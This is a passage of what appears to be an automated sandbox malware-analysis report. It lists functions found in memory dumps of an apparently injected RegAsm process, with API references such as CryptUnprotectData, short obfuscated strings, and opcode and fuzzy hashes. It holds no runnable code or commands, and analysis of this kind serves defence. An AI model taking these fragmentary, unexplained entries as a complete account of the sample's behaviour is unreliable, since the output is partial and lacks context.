Instruction Fuzzy Hash: B1115676800349DFCB20CF99C845BEEBFF4EB48320F148419EA18A7260C739A551DFA0

Function 09368E50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0936947D

Strings

E>y, xrefs: 09369432

Memory Dump Source

Source File: 00000014.00000002.2121221567.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_9360000_RegAsm.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: E>y
API String ID: 834300711-3370831285
Opcode ID: 32b118e739bde484e8c8aab9b644e1223c564e6ee4127e0d6450934a4d74157c
Instruction ID: 9ce5b0290c8b1920d9afedd9af62c5064c79095cdbcd755769324dcb696b68f6
Opcode Fuzzy Hash: 32b118e739bde484e8c8aab9b644e1223c564e6ee4127e0d6450934a4d74157c
Instruction Fuzzy Hash: 6C115676800349DFCB20DF9AC805BEEBFF4EB48320F148419EA18A7250C739A954DFA0

Function 067A5400 Relevance: 3.5, Strings: 2, Instructions: 1015COMMON

Download Yara Rule

Strings

tSAq, xrefs: 067A5BF7
tSAq, xrefs: 067A5F22

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: tSAq$tSAq
API String ID: 0-3261842419
Opcode ID: f7eea694764aa2bb97bad1b77feee4c04fe6b914b0a99250a6a3016ad47cce27
Instruction ID: f2dafdc375b3ba1d95e33e352ec0d2cb7db56948481783c6cbb0050ca3770714
Opcode Fuzzy Hash: f7eea694764aa2bb97bad1b77feee4c04fe6b914b0a99250a6a3016ad47cce27
Instruction Fuzzy Hash: 09924B30A003158FEB68DF74C85476EBBB2BF88300F1486A9D54A9B395DB34DD86CB91

Function 06750448 Relevance: 2.5, Strings: 1, Instructions: 1244COMMON

Download Yara Rule

Strings

,7q, xrefs: 06750A87

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID: ,7q
API String ID: 0-3839523172
Opcode ID: dde767617c9e7f3cd22a64a3ed8885721caeb9998559d848d011e42bdf267602
Instruction ID: caf243c15aeb85fd55740510140ffeb37431d850a6091323375fc97ea42cdb75
Opcode Fuzzy Hash: dde767617c9e7f3cd22a64a3ed8885721caeb9998559d848d011e42bdf267602
Instruction Fuzzy Hash: 7192AF34B003158FEB68AB78986877E77A3AFC8310B248469D907DB795DF74DC028B91

Function 0675C980 Relevance: 1.8, Strings: 1, Instructions: 550COMMON

Download Yara Rule

Strings

(q, xrefs: 0675CE61

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 38fd62096dbf5fa208ee74c97d634c9f12ecddb09bfd2a3e50366a6c7e5a66e2
Instruction ID: 7c582962461784fedd966efaf62a0c9edc0f4a2646a39b24877d031013affa1a
Opcode Fuzzy Hash: 38fd62096dbf5fa208ee74c97d634c9f12ecddb09bfd2a3e50366a6c7e5a66e2
Instruction Fuzzy Hash: 3922BD34E043048FCB96DF68D854BAEBBF2AF89210F1585A9D916DB351DB70EC42CB91

Function 06493F50 Relevance: 1.8, Strings: 1, Instructions: 523COMMON

Download Yara Rule

Strings

$q, xrefs: 064941E4

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 63f640dd27ff2fa2e1e9fc8dea1a184c11f8a178de66df1b675864e3a4db29a2
Instruction ID: 14dcce3cc7c0361e723b863ecb52c9e844896c07bba61cc2ec229cbe5b6e27ab
Opcode Fuzzy Hash: 63f640dd27ff2fa2e1e9fc8dea1a184c11f8a178de66df1b675864e3a4db29a2
Instruction Fuzzy Hash: 09128F34F402158FDB55DF68C484AAEBBF2BF89710B14856AE406EB365DB30DC42CBA0

Function 067A9C40 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

(_q, xrefs: 067A9E2A

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 98c4f0ce1fca9910efd56ff2a3eb3b3d139d7ea0ad048e7a7dfc03c501f1a910
Instruction ID: 646c1b0af97e289eb81410657b6cec2c71485ecdbdaa0187b2b32158e4c60f13
Opcode Fuzzy Hash: 98c4f0ce1fca9910efd56ff2a3eb3b3d139d7ea0ad048e7a7dfc03c501f1a910
Instruction Fuzzy Hash: 86A13935E10219DFDB54DF68D898AADBBB2FF88304F10C669E505AB254EF30A985CF50

Function 064967D8 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0bdc0514d1d348b83703547c6fd6b171cd9d003bc2c491935c5e7091cbc94fc
Instruction ID: 9a4f03d8dbe9e447a93bbc3d3e3e2e7191da686c1a812b31428d52bce7c63d83
Opcode Fuzzy Hash: f0bdc0514d1d348b83703547c6fd6b171cd9d003bc2c491935c5e7091cbc94fc
Instruction Fuzzy Hash: 24129D31A002199FEF55DF68D880B9EBBF2EF85310F15856AE4059B391DB30ED46CBA0

Function 067AE9C8 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032ecef0b7868c061896c34959dd8bca6825087097a38dbb7951406bcbcf841f
Instruction ID: e95eace98a5dc416885540f5f2c1ce98971697b45088f02f0ec92f28220ba72b
Opcode Fuzzy Hash: 032ecef0b7868c061896c34959dd8bca6825087097a38dbb7951406bcbcf841f
Instruction Fuzzy Hash: F6E17C35E043108FDB54DF68D498AAEBBE2EFC8310F1581A9D805AB381DA75DD41CBA1

Function 0675D4E8 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0f5710244b3e79b0dfb1a40ed366c08941b53c43b139fdbbdbca6da09bcbb8
Instruction ID: d18ec46349a316b0944b9c5eec7a87dcb8ee29ea24e0b45364341751bf9e5e75
Opcode Fuzzy Hash: 4b0f5710244b3e79b0dfb1a40ed366c08941b53c43b139fdbbdbca6da09bcbb8
Instruction Fuzzy Hash: 7AC19130E003029FEB64EB75D49477AB7A2EF80310F05C9A8C9169F655DBB0EC89CB95

Function 0649A688 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f9de1c44b29f245c54399da195fc6bd1e08242d5d91b564940f8db6b3e8d40c
Instruction ID: 61b285ac650c5879606f2987358a4b5be9575a733280baca06d0a5f51c9f4478
Opcode Fuzzy Hash: 6f9de1c44b29f245c54399da195fc6bd1e08242d5d91b564940f8db6b3e8d40c
Instruction Fuzzy Hash: 53D1F530D01318CFDB18EFB4D854A9DBBB2FF8A301F1095A9D50AAB295DB31598ACF51

Function 0649A6B8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0b5b545d6e469c751273ad23ebfaee85e5596e7074807932ecd598fb817b0e
Instruction ID: f9138afeb042a1d712f2e9441872ca0277a08a92e40cfede6db73bc0bf0e5349
Opcode Fuzzy Hash: cc0b5b545d6e469c751273ad23ebfaee85e5596e7074807932ecd598fb817b0e
Instruction Fuzzy Hash: 61D1D634D00318CFDB18EFB4D854A9DBBB2FF8A301F1095A9D50AAB294DB31598ACF11

Function 0675BEC7 Relevance: 10.3, Strings: 8, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\sq, xrefs: 0675C07C
\sq, xrefs: 0675BFDD
\sq, xrefs: 0675C014
\sq, xrefs: 0675C175
\sq, xrefs: 0675C10D
\sq, xrefs: 0675C1AC
\sq, xrefs: 0675C0B7
l^, xrefs: 0675BEE3

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID: \sq$\sq$\sq$\sq$\sq$\sq$\sq$l^
API String ID: 0-2554535964
Opcode ID: 3b44b6d568f5250031a3c777efaa1f3955f08e0f4bff6d1c0794ba36b157f023
Instruction ID: b0a7f9226749226110ba2e4f77820a8599969275f95daa0df8cb88628df92964
Opcode Fuzzy Hash: 3b44b6d568f5250031a3c777efaa1f3955f08e0f4bff6d1c0794ba36b157f023
Instruction Fuzzy Hash: 07B18C34A017059FCB54DF38C980AAABBF2FF89700B1585A9E8559B761DB70FC46CB90

Function 029DD0B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 029DD136
GetCurrentThread.KERNEL32 ref: 029DD173
GetCurrentProcess.KERNEL32 ref: 029DD1B0
GetCurrentThreadId.KERNEL32 ref: 029DD209

Strings

E>y, xrefs: 029DD0D4

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID: E>y
API String ID: 2063062207-3370831285
Opcode ID: c8f9e503ab485aacce2da80aec434e8a5117eded5a6b8731e1f1bcb1e1924f70
Instruction ID: d0cbf7416ad6107a148f0a0001e3ef2d54e61c6e98b9badb73f03e1c7b95116e
Opcode Fuzzy Hash: c8f9e503ab485aacce2da80aec434e8a5117eded5a6b8731e1f1bcb1e1924f70
Instruction Fuzzy Hash: F75153B09007098FDB14DFAAD949B9EBBF1EF88314F20C459E419A73A0DB34A945CF65

Function 06471584 Relevance: 7.8, Strings: 6, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06471A12
$q, xrefs: 0647182E
$q, xrefs: 06471A7C
$q, xrefs: 06471A57
$q, xrefs: 064718E3
$q, xrefs: 06471A88

Memory Dump Source

Source File: 00000014.00000002.2103456932.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6470000_RegAsm.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 1d4829167279788799cbc87d919144a2887fef41fa6aa6b9b76eedd8adfea712
Instruction ID: 2d725887160fad97681679d5c8c3988404f600d554f6f6265484b9c764436fe7
Opcode Fuzzy Hash: 1d4829167279788799cbc87d919144a2887fef41fa6aa6b9b76eedd8adfea712
Instruction Fuzzy Hash: 63C1C434B002059FEB55AB65D854BAEB7E6FF89304F18845AE6038B3D1DF74DC0687A1

Function 029DAE30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 029DB086

Strings

E>y, xrefs: 029DB03F

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID: E>y
API String ID: 4139908857-3370831285
Opcode ID: 237e7aefc437825f7d4f03955e573ed0dff671b92f02b4d48612fe101ef984f7
Instruction ID: 343ab4c91a451ea6a27924190a09aeb4e72ce9ee6bc3271287036296bee49989
Opcode Fuzzy Hash: 237e7aefc437825f7d4f03955e573ed0dff671b92f02b4d48612fe101ef984f7
Instruction Fuzzy Hash: 537145B0A00B058FD724DF2AD54175ABBF6FF88304F04892DD48AD7A50DB75E85ACB94

Function 029D4248 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 029D59F1

Strings

E>y, xrefs: 029D5974

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: Create
String ID: E>y
API String ID: 2289755597-3370831285
Opcode ID: 46964b43efdcf511c66efc5e0dba32cffa8689754be396bf2714b7958db77a1c
Instruction ID: 203fde9375e157f05f015c7f969c9a90fb3eae24b4035966a75970a304790cf0
Opcode Fuzzy Hash: 46964b43efdcf511c66efc5e0dba32cffa8689754be396bf2714b7958db77a1c
Instruction Fuzzy Hash: 9841F1B0C00729CBDB24CFA9C884B9DBBF5FF48314F61806AD508AB250DB75694ACF90

Function 029D5935 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 029D59F1

Strings

E>y, xrefs: 029D5974

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: Create
String ID: E>y
API String ID: 2289755597-3370831285
Opcode ID: 3adec3a19da2757693c8c2b002b80bf7e30ba6709f9dfad01cb0ec23ed6e3a60
Instruction ID: 00d641ce0373936a35bea08a0fcd231a824bb4597440511f3c7f1c8574c0af6d
Opcode Fuzzy Hash: 3adec3a19da2757693c8c2b002b80bf7e30ba6709f9dfad01cb0ec23ed6e3a60
Instruction Fuzzy Hash: D141F371C00729CFEB24DFA9C884B9DBBB5FF48304F64816AD418AB250DB75694ACF90

Function 029DA858 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,029DB101,00000800,00000000,00000000), ref: 029DB312

Strings

E>y, xrefs: 029DB2C7

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: E>y
API String ID: 1029625771-3370831285
Opcode ID: 3cd5477586a8592def9e5774d703668534178ff3bb995801b7bebb81718c6774
Instruction ID: 571aed2fb06a8dfa78f20fe3013b222699ed9423a1ca1b00f0c9afd1bd687a84
Opcode Fuzzy Hash: 3cd5477586a8592def9e5774d703668534178ff3bb995801b7bebb81718c6774
Instruction Fuzzy Hash: 6D31EEB6C043488FEB11CFAAC891BDEBFF4EB99314F05805AD555AB211C378950ADFA1

Function 029DD300 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029DD387

Strings

E>y, xrefs: 029DD31F

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID: E>y
API String ID: 3793708945-3370831285
Opcode ID: acc421aafc322d47e934b1987970aa47d96890423f8c406b1cd1b3a66c2a0ce9
Instruction ID: 3cf022dbd6f817d87746e666c27a5008f0cbb46af604c5608022d4af33b4fac6
Opcode Fuzzy Hash: acc421aafc322d47e934b1987970aa47d96890423f8c406b1cd1b3a66c2a0ce9
Instruction Fuzzy Hash: 8821E4B5D003489FDB10CF9AD985ADEFBF4EB48324F14841AE918A3350C774A944CFA4

Function 029DB2A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,029DB101,00000800,00000000,00000000), ref: 029DB312

Strings

E>y, xrefs: 029DB2C7

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: E>y
API String ID: 1029625771-3370831285
Opcode ID: 9fd7b354445ad67bc4b65f35770b1a050ed2895a8f5c99249152d1b9a5b7976a
Instruction ID: 8d8a8021815a7b483e886813bdc6a8e002d7527bb0d94579c6ed1018d6f9dacd
Opcode Fuzzy Hash: 9fd7b354445ad67bc4b65f35770b1a050ed2895a8f5c99249152d1b9a5b7976a
Instruction Fuzzy Hash: 931144B6C003488FDB20CF9AC844BDEFBF4EB48314F14842AD529A7200C779A545CFA4

Function 029DA870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,029DB101,00000800,00000000,00000000), ref: 029DB312

Strings

E>y, xrefs: 029DB2C7

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: E>y
API String ID: 1029625771-3370831285
Opcode ID: f86d9bca6649cc597d473a09b0ed3db260ca8d76076d18190245e3560e15c7ec
Instruction ID: 0ff35548182c8fa8028561b93f5d791b68a53c57099389e81b4f38fc33ca04c9
Opcode Fuzzy Hash: f86d9bca6649cc597d473a09b0ed3db260ca8d76076d18190245e3560e15c7ec
Instruction Fuzzy Hash: 4A1114B6D003499FDB20CF9AC844B9EFBF4EB48314F15842ED919A7200C775A945CFA4

Function 029DB020 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 029DB086

Strings

E>y, xrefs: 029DB03F

Memory Dump Source

Source File: 00000014.00000002.2070661128.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_29d0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID: E>y
API String ID: 4139908857-3370831285
Opcode ID: de8a593e79742e6c2e273596ea295e3b7cc132674cb2e94b3609e56b229fcac3
Instruction ID: f93ff4a732a814d92c6fa41f2fd50fdd32eff1217dabc0cca4d6a2ff4037c5ff
Opcode Fuzzy Hash: de8a593e79742e6c2e273596ea295e3b7cc132674cb2e94b3609e56b229fcac3
Instruction Fuzzy Hash: 9A110FB6C003498FCB20DF9AC844A9EFBF4AB88224F15842AD429A7210C779A545CFA1

Function 067A67A8 Relevance: 3.2, Strings: 2, Instructions: 656COMMON

Download Yara Rule

Strings

Hq, xrefs: 067A6DB2
(q, xrefs: 067A6A8E

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 2d56b40e38d1f842ae0a684aac7a6af5f734b7202911d58ddd36062a5e007b2f
Instruction ID: d7786a1bc254007a479c3c7831f0cf941dc9cb9d2663ec9e545d592459560af3
Opcode Fuzzy Hash: 2d56b40e38d1f842ae0a684aac7a6af5f734b7202911d58ddd36062a5e007b2f
Instruction Fuzzy Hash: CD32BD34B043158FDB55DB78C854A6EBBF2EFC9310B1881A9D90ADB391DB319C46CBA1

Function 067AC748 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

>XGq, xrefs: 067ACB1D
,kAq, xrefs: 067AC8B2

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: ,kAq$>XGq
API String ID: 0-4084177003
Opcode ID: fad250f498017403d9ba6766b10a92b7eca0e927b63a1034f61706be634add1a
Instruction ID: f7cb433692ccf00ab68c891691b6b0418fc26f916cb4cfb198dbcb66b32946ff
Opcode Fuzzy Hash: fad250f498017403d9ba6766b10a92b7eca0e927b63a1034f61706be634add1a
Instruction Fuzzy Hash: 48C18A31F003159FDB59DBB8C854AAEBBF6AFC8310F248169D506AB795DB319C42CB80

Function 067A2DB0 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

(q, xrefs: 067A2E03
Hq, xrefs: 067A2E99

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 68ed3d8fb0ee7766bde967dfa00f494dd85239231e384de3f707c9349f648058
Instruction ID: 63a0d9752ce9eaaa1abfd9ec2bbdf89361108949d4798a01785797ec27317fbb
Opcode Fuzzy Hash: 68ed3d8fb0ee7766bde967dfa00f494dd85239231e384de3f707c9349f648058
Instruction Fuzzy Hash: 56B1D130B043118FDB54DF38D854A3E77E2AFCA260B1881A9D91ACB7A5DB30DD46CB91

Function 067A3CF8 Relevance: 2.8, Strings: 2, Instructions: 287COMMON

Download Yara Rule

Strings

4'q, xrefs: 067A3D77
4'q, xrefs: 067A3D5E

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: f41357f03fa1fdc3c667f126c5dbf2e338968f0b00c60506422b08d5f69d4a1c
Instruction ID: 16f7fbb9fb3f7742d56751c6024eb6ce3d33586a8496bce0d73d1d15a8d672ec
Opcode Fuzzy Hash: f41357f03fa1fdc3c667f126c5dbf2e338968f0b00c60506422b08d5f69d4a1c
Instruction Fuzzy Hash: 9BB17931F042068FDB58DFA9C8446AEBBF6AFC8310F248569D506EB390DB759C46CB90

Function 067AD078 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

xq, xrefs: 067AD163
xq, xrefs: 067AD19B

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID: xq$xq
API String ID: 0-2333185093
Opcode ID: f3e16739c129ce2a0dc50155b407213feab11678ad6285af2d6fa18778944eae
Instruction ID: eec7070217d205f9aa781ce1a8a225762d540a7b848d8c2ab96a32bf84e607e8
Opcode Fuzzy Hash: f3e16739c129ce2a0dc50155b407213feab11678ad6285af2d6fa18778944eae
Instruction Fuzzy Hash: BA71BF70A003059FDB29DF79C954AAABBF2FF89304B14C56DC406AB795DB31E906CB90

Function 0679BB98 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

4'q, xrefs: 0679BBAC
tY@q, xrefs: 0679BD53

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'q$tY@q
API String ID: 0-1362775665
Opcode ID: 43391fd910cc04239de238745abee358708c97501b34b49e2087382bdf85999c
Instruction ID: 0e77fe46c83e89de99de19a7780cbd239f30b11a047d7319752886185f4ab8d3
Opcode Fuzzy Hash: 43391fd910cc04239de238745abee358708c97501b34b49e2087382bdf85999c
Instruction Fuzzy Hash: CB51C031B006169FCB54DF69E88086EFBF6FF85710714866AD529DB791CB30AC058BE0

Function 06497D58 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

E>y, xrefs: 06497D7D
E>y, xrefs: 06497F17

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID: E>y$E>y
API String ID: 0-3507542557
Opcode ID: 641dda0b835a3634140c7e5c23e357cba9d16c06c49951777ea31a52b926876d
Instruction ID: 5643a6256e09114e51369673fef29763145ae6cace0c12fe91d5c77b54f56438
Opcode Fuzzy Hash: 641dda0b835a3634140c7e5c23e357cba9d16c06c49951777ea31a52b926876d
Instruction Fuzzy Hash: 5C512571E103188FDF65CFA9C885BDEBBB2AF88700F14852AD415AB284DB749842CF90

Function 06498C88 Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

(q, xrefs: 06498D00
(q, xrefs: 06498D2C

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: f76f04e4ff2bb5674967a6d6678ab2d7ff07d42877a00b6e79cadab29f1f1392
Instruction ID: 6ab4e584e9ac046ea13a17446f4643052638cdae5db74f1ce8b3e306e62c488e
Opcode Fuzzy Hash: f76f04e4ff2bb5674967a6d6678ab2d7ff07d42877a00b6e79cadab29f1f1392
Instruction Fuzzy Hash: 8341F231B042185FDB49AF78982176E3B67AFC5350F54846DE909DB390CE388C12C7EA

Function 06497D4C Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

E>y, xrefs: 06497D7D
E>y, xrefs: 06497D9D

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID: E>y$E>y
API String ID: 0-3507542557
Opcode ID: 4ae7fdf3ccf6b7e93931681a87a0cf2e4769ee974b3d3bd86f8d87455be308ee
Instruction ID: 913ece043f3c2959f538add204aacaaf5122b0a9627176eefa961203be9ea45f
Opcode Fuzzy Hash: 4ae7fdf3ccf6b7e93931681a87a0cf2e4769ee974b3d3bd86f8d87455be308ee
Instruction Fuzzy Hash: CA513670D102189FDF65CFAAC885BDEBFF5AF48700F14852AE415AB284DB749842CFA1

Function 067AD068 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

xq, xrefs: 067AD163
xq, xrefs: 067AD19B

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

